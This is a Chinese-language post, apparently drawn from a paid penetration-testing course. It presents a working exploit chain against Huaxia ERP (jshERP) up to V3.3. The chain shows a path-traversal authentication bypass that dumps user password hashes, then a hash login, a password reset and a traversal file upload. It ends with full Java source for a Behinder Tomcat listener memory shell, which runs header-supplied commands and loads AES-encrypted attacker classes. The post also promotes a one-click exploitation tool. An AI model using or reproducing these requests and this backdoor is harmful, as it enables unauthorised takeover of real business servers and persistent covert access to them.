免责声明: 由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
1 ►
前言
华夏ERP全版本未授权RCE及内存马注入。本文来自《实战攻防》课程开源应用渗透利用篇。作者:xiuxian
点击下文了解详情👇
2 ►
权限绕过
目前最新版V3.3
1GET/jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/getAllList HTTP/1.1
通过getAllList读取用户名,密码MD5值。
Hash登录
使用读取到的密码MD5值登录超级管理员后台。
1POST /jshERP-boot/user/login HTTP/1.1 2Host: IP 3Content-Length: 67 4Accept: application/json, text/plain, */* 5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 6Content-Type: application/json;charset=UTF-8 7Origin: http://172.20.10.3:3000 8Referer: http://172.20.10.3:3000/user/login 9Accept-Encoding: gzip, deflate 10Accept-Language: zh-CN,zh;q=0.9 11Cookie: Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1724134392; HMACCOUNT=4FC1696FCCBA0C17; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1724138837 12Connection: close 13 14 15{"loginName":"admin","password":"e10adc3949ba59abbe56e057f20f883e"}
1/jshERP-boot/platformConfig/getPlatform/..;/..;/..;/jshERP-boot/user/resetPwd 2 3 4{"id":63}
3 ►
后台利用
超级管理员用户登录后,使用uploadPluginConfigFile接口创建../plugin目录;此目录创建后即可部署插件。
1POST /jshERP-boot/plugin/uploadPluginConfigFile HTTP/1.1 2Host: 172.20.10.3:3000 3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 4Accept: */* 5Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 6Accept-Encoding: gzip, deflate 7X-Requested-With: XMLHttpRequest 8Content-Type: multipart/form-data; boundary=---------------------------64343665641219398361207370473 9X-Access-Token: 90777cf909864636a458b05de1eab2a9_0 10Content-Length: 247 11 12 13 14 15-----------------------------64343665641219398361207370473 16Content-Disposition: form-data; name="configFile"; filename="../plugins/success.txt" 17Content-Type: text/plain 18 19 20success 21 22 23-----------------------------64343665641219398361207370473--
后台上传插件
编写springboot-plugin-framework-parent插件。
1https://gitee.com/xiongyi01/springboot-plugin-framework-parent
编写冰蝎监听器,部署插件注入内存马。
1package ysoserial.payloads.templates;
2
3
4import com.sun.jmx.mbeanserver.NamedObject;
5import com.sun.jmx.mbeanserver.Repository;
6import com.sun.org.apache.xalan.internal.xsltc.DOM;
7import com.sun.org.apache.xalan.internal.xsltc.TransletException;
8import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
9import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
10import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
11import org.apache.catalina.connector.Request;
12import org.apache.catalina.connector.RequestFacade;
13import org.apache.catalina.connector.Response;
14import org.apache.catalina.core.StandardContext;
15import org.apache.tomcat.util.modeler.Registry;
16
17
18import javax.crypto.Cipher;
19import javax.crypto.spec.SecretKeySpec;
20import javax.management.DynamicMBean;
21import javax.management.MBeanServer;
22import javax.management.ObjectName;
23import javax.servlet.ServletRequestEvent;
24import javax.servlet.ServletRequestListener;
25import javax.servlet.http.HttpSession;
26import java.lang.reflect.Field;
27import java.lang.reflect.Method;
28import java.util.HashMap;
29import java.util.Scanner;
30import java.util.Set;
31
32
33public class TomcatListenerMemShellFromJMX extends AbstractTranslet implements ServletRequestListener {
34 static {
35 try {
36 MBeanServer mbeanServer = Registry.getRegistry(null, null).getMBeanServer();
37 Field field = Class.forName("com.sun.jmx.mbeanserver.JmxMBeanServer").getDeclaredField("mbsInterceptor");
38 field.setAccessible(true);
39 Object obj = field.get(mbeanServer);
40
41
42 field = Class.forName("com.sun.jmx.interceptor.DefaultMBeanServerInterceptor").getDeclaredField("repository");
43 field.setAccessible(true);
44 Repository repository = (Repository) field.get(obj);
45
46
47 Set<NamedObject> objectSet = repository.query(new ObjectName("Catalina:host=localhost,name=NonLoginAuthenticator,type=Valve,*"), null);
48 if (objectSet.size() == 0) {
49 // springboot的jmx中为Tomcat而非Catalina
50 objectSet = repository.query(new ObjectName("Tomcat:host=localhost,name=NonLoginAuthenticator,type=Valve,*"), null);
51 }
52
53
54 for (NamedObject namedObject : objectSet) {
55 DynamicMBean dynamicMBean = namedObject.getObject();
56 field = Class.forName("org.apache.tomcat.util.modeler.BaseModelMBean").getDeclaredField("resource");
57 field.setAccessible(true);
58 obj = field.get(dynamicMBean);
59
60
61 field = Class.forName("org.apache.catalina.authenticator.AuthenticatorBase").getDeclaredField("context");
62 field.setAccessible(true);
63 StandardContext standardContext = (StandardContext) field.get(obj);
64
65
66 TomcatListenerMemShellFromJMX listener = new TomcatListenerMemShellFromJMX();
67 standardContext.addApplicationEventListener(listener);
68 }
69 } catch (Exception e) {
70// e.printStackTrace();
71 }
72 }
73
74
75 @Override
76 public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
77
78
79 }
80
81
82 @Override
83 public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
84
85
86 }
87
88
89 @Override
90 public void requestDestroyed(ServletRequestEvent servletRequestEvent) {
91
92
93 }
94
95
96 @Override
97 public void requestInitialized(ServletRequestEvent servletRequestEvent) {
98// Listener马没有包装类问题
99 try {
100 RequestFacade requestFacade = (RequestFacade) servletRequestEvent.getServletRequest();
101 Field f = requestFacade.getClass().getDeclaredField("request");
102 f.setAccessible(true);
103 Request request = (Request) f.get(requestFacade);
104 Response response = request.getResponse();
105 // 入口
106 if (request.getHeader("Referer").equalsIgnoreCase("https://www.google.com/")) {
107 // cmdshell
108 if (request.getHeader("x-client-data").equalsIgnoreCase("cmd")) {
109 String cmd = request.getHeader("cmd");
110 if (cmd != null && !cmd.isEmpty()) {
111 String[] cmds = null;
112 if (System.getProperty("os.name").toLowerCase().contains("win")) {
113 cmds = new String[]{"cmd", "/c", cmd};
114 } else {
115 cmds = new String[]{"/bin/bash", "-c", cmd};
116 }
117 String result = new Scanner(Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();
118 response.resetBuffer();
119 response.getWriter().println(result);
120 response.flushBuffer();
121 response.finishResponse();
122 }
123 } else if (request.getHeader("x-client-data").equalsIgnoreCase("rebeyond")) {
124 if (request.getMethod().equals("POST")) {
125 // 创建pageContext
126 HashMap pageContext = new HashMap();
127
128
129 // lastRequest的session是没有被包装的session!!
130 HttpSession session = request.getSession();
131 pageContext.put("request", request);
132 pageContext.put("response", response);
133 pageContext.put("session", session);
134 // 这里判断payload是否为空 因为在springboot2.6.3测试时request.getReader().readLine()可以获取到而采取拼接的话为空字符串
135 String payload = request.getReader().readLine();
136
137
138// System.out.println(payload);
139 // 冰蝎逻辑
140 String k = "e45e329feb5d925b"; // rebeyond
141 session.putValue("u", k);
142 Cipher c = Cipher.getInstance("AES");
143 c.init(2, new SecretKeySpec(k.getBytes(), "AES"));
144 Method method = Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
145 method.setAccessible(true);
146 byte[] evilclass_byte = c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(payload));
147 Class evilclass = (Class) method.invoke(Thread.currentThread().getContextClassLoader(), evilclass_byte, 0, evilclass_byte.length);
148 evilclass.newInstance().equals(pageContext);
149 }
150 } else {
151 response.resetBuffer();
152 response.getWriter().println("error");
153 response.flushBuffer();
154 response.finishResponse();
155 }
156 }
157 } catch (Exception e) {
158// e.printStackTrace();
159 }
160 }
161}
插件启动时,new 一个冰蝎监听马实例。
上传插件连接内存马
1密码:rebeyond 2 3 4Referer: https://www.google.com/ 5x-client-data: rebeyond
华夏ERP漏洞利用一键化工具-实战攻防课程内部专版,报名课程免费获取
4 ►